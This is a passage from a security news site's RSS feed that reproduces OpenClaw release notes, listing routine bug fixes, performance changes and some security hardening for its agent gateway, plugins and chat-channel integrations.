<p>Plugins/runtime-deps: treat no-main and export-map package sentinels without reachable entry files as incomplete, so Gateway startup, doctor, and lazy plugin loads repair interrupted bundled dependency installs instead of accepting package.json-only partial installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360048495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75183/hovercard" href="https://github.com/openclaw/openclaw/pull/75183">#75183</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: keep runtime inspection and channel maintenance commands from downloading bundled plugin dependencies, route explicit repairs through <code>openclaw plugins deps --repair</code>, and still allow Gateway/DO paths to repair missing deps before import. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @xiaohuaxi.</p>
</li>
<li>
<p>Updates: force non-deferred, no-cooldown update restarts after package-manager updates requested through the live Gateway control plane and fail release validation on post-swap stale chunk import crashes, so Telegram/Discord imports do not stay pointed at removed dist files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360403986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75206" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75206/hovercard" href="https://github.com/openclaw/openclaw/issues/75206">#75206</a>. Thanks @xonaman and @faux123.</p>
</li>
<li>
<p>Agents/tool-result guard: use the resolved runtime context token budget for non-context-engine tool-result overflow checks, so long tool-heavy sessions no longer compact early when <code>contextTokens</code> is larger than native <code>contextWindow</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355916636" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74917" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74917/hovercard" href="https://github.com/openclaw/openclaw/issues/74917">#74917</a>. Thanks @kAIborg24.</p>
</li>
<li>
<p>Gateway/systemd: exit with sysexits 78 for supervised lock and <code>EADDRINUSE</code> conflicts so <code>RestartPreventExitStatus=78</code> stops <code>Restart=always</code> restart loops instead of repeatedly reloading plugins against an occupied port. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358976301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75115" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75115/hovercard" href="https://github.com/openclaw/openclaw/issues/75115">#75115</a>. Thanks @yhyatt.</p>
</li>
<li>
<p>Agents/runtime: skip blank visible user prompts at the embedded-runner boundary before provider submission while still allowing internal runtime-only turns and media-only prompts, so Telegram/group sessions no longer leak raw empty-input provider errors when replay history exists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348363760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74137/hovercard" href="https://github.com/openclaw/openclaw/issues/74137">#74137</a>. Thanks @yelog, @Gracker, and @nhaener.</p>
</li>
<li>
<p>Agents/Codex: isolate local Codex app-server <code>CODEX_HOME</code> and <code>HOME</code> per agent and add a deliberate Codex migration path with selectable skill copies, so personal Codex CLI skills, plugins, config, and hooks no longer leak into OpenClaw agents unless the operator migrates them into the workspace. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Security/Nextcloud Talk: make webhook signature validation use the padded timing-safe compare path even when the supplied signature length is wrong, keep normalized header lookup behavior, and extend regression coverage for tampered bodies, wrong secrets, array-backed headers, and truncated signatures. Carries forward earlier contributor work from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4102742606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50516" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50516/hovercard" href="https://github.com/openclaw/openclaw/pull/50516">#50516</a> by teddytennant. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175383760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58097" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58097/hovercard" href="https://github.com/openclaw/openclaw/pull/58097">#58097</a>) Thanks @gavyngong.</p>
</li>
<li>
<p>Plugins/runtime-deps: replace stale symlinked mirror target roots before writing runtime-mirror temp files and skip rewriting already materialized hardlinks, so cross-version container upgrades no longer crash-loop on read-only image-layer paths while warm mirrors do less churn. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358776355" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75108" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75108/hovercard" href="https://github.com/openclaw/openclaw/issues/75108">#75108</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coletebou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coletebou">@coletebou</a> and @xiaohuaxi.</p>
</li>
<li>
<p>Auto-reply/group chats: fall back to automatic source delivery when a channel precomputes message-tool-only replies but the <code>message</code> tool is unavailable, so Discord/Slack-style group turns do not silently complete without a visible reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355462791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74868/hovercard" href="https://github.com/openclaw/openclaw/issues/74868">#74868</a>. Thanks @kagura-agent.</p>
</li>
<li>
<p>Browser/gateway: share one browser control runtime across the HTTP control server and <code>browser.request</code>, and refresh browser profile config from the source snapshot, so CLI status/start honors configured <code>browser.executablePath</code>, <code>headless</code>, and <code>noSandbox</code> instead of falling back to stale auto-detection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358368287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75087" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75087/hovercard" href="https://github.com/openclaw/openclaw/issues/75087">#75087</a>; repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344146532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73617/hovercard" href="https://github.com/openclaw/openclaw/issues/73617">#73617</a>. Thanks @civiltox and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</p>
</li>
<li>
<p>Agents/subagents: bound automatic orphan recovery with persisted recovery attempts and a wedged-session tombstone, and teach task maintenance/doctor to reconcile those sessions so restart loops no longer require manual <code>sessions.json</code> surgery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355427349" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74864/hovercard" href="https://github.com/openclaw/openclaw/issues/74864">#74864</a>. Thanks @solosage1.</p>
</li>
<li>
<p>Plugins/runtime-deps: keep bundled provider policy config loading from staging plugin runtime dependencies, so config reads no longer fail on locked-down <code>/var/lib/openclaw/plugin-runtime-deps</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356579392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74971" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74971/hovercard" href="https://github.com/openclaw/openclaw/issues/74971">#74971</a>. Thanks @eurojojo.</p>
</li>
<li>
<p>Memory/runtime-deps: retain the native <code>node-llama-cpp</code> runtime only when local memory search is configured, so packaged installs can repair local embeddings without relying on unreachable global npm installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355063600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74777/hovercard" href="https://github.com/openclaw/openclaw/issues/74777">#74777</a>. Thanks @LLagoon3.</p>
</li>
<li>
<p>Gateway/startup: skip pre-bind web-fetch provider discovery for credential-free <code>tools.web.fetch</code> config, so Docker/Kubernetes gateways bind even when optional fetch limits are present. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355733598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74896" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74896/hovercard" href="https://github.com/openclaw/openclaw/issues/74896">#74896</a>. Thanks @KoykL.</p>
</li>
<li>
<p>Signal: match group allowlists against inbound Signal group ids as well as sender ids, and process explicitly configured Signal groups without requiring mentions unless <code>requireMention</code> is set. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4124822798" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53308" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53308/hovercard" href="https://github.com/openclaw/openclaw/issues/53308">#53308</a>. Thanks @minupla and @juan-flores077.</p>
</li>
<li>
<p>Signal: bound <code>signal-cli</code> installer release and archive downloads with explicit timeouts, declared and streamed size checks, and partial-file cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131804194" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54153" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54153/hovercard" href="https://github.com/openclaw/openclaw/issues/54153">#54153</a>. Thanks @jinduwang1001-max and @juan-flores077.</p>
</li>
<li>
<p>Slack: require bot-authored room messages with <code>allowBots=true</code> to come from an explicitly channel-allowlisted bot or from a room where an explicit Slack owner is present, so broad bot relays cannot run unattended. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190405125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59284/hovercard" href="https://github.com/openclaw/openclaw/issues/59284">#59284</a>. Thanks @andrewhong-translucent.</p>
</li>
<li>
<p>Signal: derive <code>getAttachment</code> HTTP response caps from <code>channels.signal.mediaMaxMb</code> with base64 headroom, so inbound photos and videos no longer drop behind the 1 MiB RPC default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343275028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73564" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73564/hovercard" href="https://github.com/openclaw/openclaw/issues/73564">#73564</a>. Thanks @heyhudson.</p>
</li>
<li>
<p>Signal: keep the long-lived receive SSE monitor open while idle instead of applying the 10s RPC/check deadline, so <code>signal-cli</code> 0.14.3 event streams no longer reconnect before inbound messages arrive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354790687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74741" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74741/hovercard" href="https://github.com/openclaw/openclaw/issues/74741">#74741</a>. Thanks @fgabelmannjr and @k7n4n5t3w4rt.</p>
</li>
<li>
<p>CLI/progress: suppress nested progress spinners and line clears while TUI input owns raw stdin, so Crestodian <code>/status</code> no longer disturbs the active input row. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356940813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75003" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75003/hovercard" href="https://github.com/openclaw/openclaw/pull/75003">#75003</a>) Thanks @velvet-shark.</p>
</li>
<li>
<p>Models/OpenAI Codex: restore <code>openai-codex/gpt-5.4-mini</code> for ChatGPT/Codex OAuth PI runs after live OAuth proof, and align the manifest, forward-compat metadata, docs, and regression tests so stale cron and heartbeat configs resolve again. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351824827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74451" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74451/hovercard" href="https://github.com/openclaw/openclaw/issues/74451">#74451</a>. Thanks @0xCyda, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, and @Marvae.</p>
</li>
<li>
<p>Plugins/runtime-deps: always write a dependency map in generated runtime-deps install manifests, so npm does not crash or prune staged bundled-plugin packages when the plan is empty. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356326245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74949" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74949/hovercard" href="https://github.com/openclaw/openclaw/issues/74949">#74949</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Telegram: use durable message edits for streaming previews instead of native draft state, so generated replies no longer flicker through draft-to-message transitions that look like duplicates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358015486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75073" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75073/hovercard" href="https://github.com/openclaw/openclaw/pull/75073">#75073</a>) Thanks @obviyus.</p>
</li>
<li>
<p>Telegram: echo preflighted DM voice-note transcripts back to the originating chat, including Telegram DM topic thread metadata, instead of only echoing later media-understanding transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358306338" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75084" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75084/hovercard" href="https://github.com/openclaw/openclaw/issues/75084">#75084</a>. Thanks @M-Lietz.</p>
</li>
<li>
<p>Telegram: clamp low long-polling client timeouts so configured <code>timeoutSeconds</code> values below the <code>getUpdates</code> poll window no longer force a fresh HTTPS connection every few seconds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358955789" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75114" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75114/hovercard" href="https://github.com/openclaw/openclaw/issues/75114">#75114</a>. Thanks @hpinho77.</p>
</li>
<li>
<p>Web search: describe <code>web_search</code> as using the configured provider instead of hard-coding Brave when DuckDuckGo or another provider is active. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358379474" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75088" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75088/hovercard" href="https://github.com/openclaw/openclaw/issues/75088">#75088</a>. Thanks @sun-rongyang.</p>
</li>
<li>
<p>Infra/tmp: tolerate concurrent temp-dir permission repairs by rechecking directories that another process already tightened, so parallel ACP subprocess startup no longer throws <code>Unsafe fallback OpenClaw temp dir</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265270151" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66867" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66867/hovercard" href="https://github.com/openclaw/openclaw/issues/66867">#66867</a>. Thanks @Kane808-AI and @jarvisz8.</p>
</li>
<li>
<p>Agents/compaction: add an opt-in <code>agents.defaults.compaction.midTurnPrecheck</code> mid-turn precheck that detects tool-loop context pressure and triggers compaction before the next tool call instead of waiting for end-of-turn. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342551639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73499" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73499/hovercard" href="https://github.com/openclaw/openclaw/pull/73499">#73499</a>) Thanks @marchpure and @haoxingjun.</p>
</li>
<li>
<p>Gateway/approvals: let loopback token/password-backed native approval clients resolve exec approvals without attaching stale paired Gateway identities, while remote and unauthenticated approval clients keep normal device identity behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352121168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74472" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74472/hovercard" href="https://github.com/openclaw/openclaw/pull/74472">#74472</a>)</p>
</li>
<li>
<p>Gateway/config: include rejected validation paths in foreground and service last-known-good recovery logs plus main-agent notices, so unsupported direct edits explain which key caused restore instead of looking like silent reversion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357904226" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75060" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75060/hovercard" href="https://github.com/openclaw/openclaw/issues/75060">#75060</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: hash the OS-canonical <code>packageRoot</code> via <code>fs.realpathSync.native</code> (with <code>path.resolve</code> fallback) when computing the bundled runtime-deps stage key, so loader and channel <code>bundled-root</code> callers no longer derive divergent stage directories under <code>~/.openclaw/plugin-runtime-deps/openclaw-&lt;version&gt;-&lt;hash&gt;/</code> and bundled channels stop failing with <code>ENOENT</code> on shared dist chunks under Windows npm symlinks, junctions, or PM2 multi-instance worker layouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356458695" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74963" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74963/hovercard" href="https://github.com/openclaw/openclaw/issues/74963">#74963</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357655594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75048" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75048/hovercard" href="https://github.com/openclaw/openclaw/pull/75048">#75048</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>fix(logging): add redaction patterns for Tencent Cloud, Alibaba Cloud, HuggingFace and Replicate API keys (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4176207505" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58162/hovercard" href="https://github.com/openclaw/openclaw/pull/58162">#58162</a>). Thanks @gavyngong</p>
</li>
<li>
<p>Pairing: surface unexpected allowlist filesystem stat errors instead of treating the allowlist as missing, so permission and I/O failures are visible during pairing authorization checks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226978925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63324" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63324/hovercard" href="https://github.com/openclaw/openclaw/pull/63324">#63324</a>) Thanks @franciscomaestre.</p>
</li>
<li>
<p>macOS app: reserve layout space for exec approval command details so the allow dialog no longer overlaps the command, context, and action buttons. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363145435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75470" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75470/hovercard" href="https://github.com/openclaw/openclaw/pull/75470">#75470</a>) Thanks @ngutman.</p>
</li>
<li>
<p>Agents/failover: carry <code>sessionId</code>, <code>lane</code>, <code>provider</code>, <code>model</code>, and <code>profileId</code> attribution through <code>FailoverError</code> and <code>describeFailoverError</code>/<code>coerceToFailoverError</code> so structured error logs (e.g. <code>gateway.err.log</code> ingestion) can attribute exhausted-fallback wrapper errors to the originating session and last-attempted provider instead of dropping the metadata after the per-profile errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4055391486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42713" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42713/hovercard" href="https://github.com/openclaw/openclaw/issues/42713">#42713</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342577768" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73506" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73506/hovercard" href="https://github.com/openclaw/openclaw/pull/73506">#73506</a>) Thanks @wenxu007.</p>
</li>
<li>
<p>Context Engine: treat assembled prompt as the default authority for preemptive overflow prechecks so engines that return a windowed, self-contained context no longer trigger false hard-fail compactions on huge raw history. Engines whose assembled view can hide overflow risk can opt back into the legacy behavior with <code>AssembleResult.promptAuthority: "preassembly_may_overflow"</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349382434" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74255" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74255/hovercard" href="https://github.com/openclaw/openclaw/pull/74255">#74255</a>) Thanks @100yenadmin.</p>
</li>
<li>
<p>Mattermost: refresh current native slash command registrations before accepting callbacks so stale tokens from deleted or regenerated commands stop being accepted without a gateway restart while failed validations stay briefly cached and lookup starts are rate-limited per command, gate each callback against the resolved command's own startup token so a token leaked for one slash command cannot poison another command's failure cache, redact slash validation lookup errors, and add a body read timeout to the multi-account routing path so slow callback senders cannot tie up the dispatcher. Thanks @feynman-hou and @eleqtrizit.</p>
</li>
<li>
<p>Security/dotenv: block <code>COMSPEC</code> in workspace <code>.env</code> so a malicious repo cannot redirect Windows <code>cmd.exe</code> resolution, and lock in case-insensitive workspace-<code>.env</code> regression coverage for the full Windows shell trust-root family (<code>COMSPEC</code>, <code>PROGRAMFILES</code>, <code>PROGRAMW6432</code>, <code>SYSTEMROOT</code>, <code>WINDIR</code>). (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351902035" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74460" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74460/hovercard" href="https://github.com/openclaw/openclaw/pull/74460">#74460</a>) Thanks @mmaps.</p>
</li>
<li>
<p>Gateway/install: drop stale version-manager and package-manager PATH entries preserved from old service files during <code>gateway install --force</code> and doctor repair, so the repair path no longer recreates <code>gateway-path-nonminimal</code> warnings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360586723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75220" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75220/hovercard" href="https://github.com/openclaw/openclaw/issues/75220">#75220</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363000761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75440" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75440/hovercard" href="https://github.com/openclaw/openclaw/pull/75440">#75440</a>) Thanks @leonaIee, @renaudcerrato, and @aaajiao.</p>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.2-beta.2]]></title>
<description><![CDATA[2026.5.2
Highlights

External plugin installation now covers diagnostics, onboarding, doctor repair, channel setup, install/update records, and artifact metadata while keeping bare package installs on npm for the first cutover. Thanks @vincentkoc.
Gateway startup, session listing, task maintenanc...]]></description>
<link>https://tsecurity.de/de/3482814/downloads/openclaw-202652-beta2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3482814/downloads/openclaw-202652-beta2/</guid>
<pubDate>Sat, 02 May 2026 22:46:16 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.2</h2>
<h3>Highlights</h3>
<ul>
<li>External plugin installation now covers diagnostics, onboarding, doctor repair, channel setup, install/update records, and artifact metadata while keeping bare package installs on npm for the first cutover. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway startup, session listing, task maintenance, prompt prep, plugin loading, and filesystem hot paths get targeted cache and fanout reductions for large or plugin-heavy installs.</li>
<li>Control UI and WebChat reliability improves across Sessions, Cron, long-running Gateway WebSockets, grouped-message width, slash-command feedback, iOS PWA bounds, selection contrast, and Talk diagnostics.</li>
<li>Channel and provider fixes cover Telegram topic commands and networking, Discord delivery and startup edge cases, OpenAI-compatible TTS/Realtime, OpenRouter/DeepSeek replay, Anthropic-compatible streaming, Brave/SearXNG/Firecrawl web search, and voice-call routing.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>
<p>Gateway/startup: skip plugin-backed auth-profile overlays during startup secrets preflight, reducing gateway readiness latency while keeping reload and OAuth recovery paths overlay-capable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285812464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68327" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68327/hovercard" href="https://github.com/openclaw/openclaw/pull/68327">#68327</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JIRBOY/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JIRBOY">@JIRBOY</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: make diagnostics, onboarding, doctor repair, and channel setup carry ClawPack metadata through install records while keeping explicit <code>clawhub:</code> installs on ClawHub and bare package installs on npm for the launch cutover. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/CLI: include package dependency install state in <code>openclaw plugins list --json</code> so scripts can spot missing plugin dependencies without runtime-loading plugins.</p>
</li>
<li>
<p>Plugins/runtime: scope broad runtime preloads to the effective plugin ids derived from config, startup planning, configured channels, slots, and auto-enable rules instead of importing every discoverable plugin.</p>
</li>
<li>
<p>Agents/runtime: reuse the startup-loaded plugin registry for request-time providers, tools, channel actions, web/capability/memory/migration helpers, and memoized provider extra-params so stable embedded-run inputs no longer repeat plugin registry resolution while model-specific transport hook patches stay isolated. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Agents/runtime: memoize transcript replay-policy resolution for stable config and process-env runs while preserving custom-env provider hook behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Infra/path-guards: add a fast path for canonical absolute POSIX containment checks, avoiding repeated <code>path.resolve</code> and <code>path.relative</code> work in hot filesystem walkers. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367529908" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75895" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75895/hovercard" href="https://github.com/openclaw/openclaw/issues/75895">#75895</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363840300" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75575" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75575/hovercard" href="https://github.com/openclaw/openclaw/issues/75575">#75575</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289737301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68782" data-hovercard-type="issue" 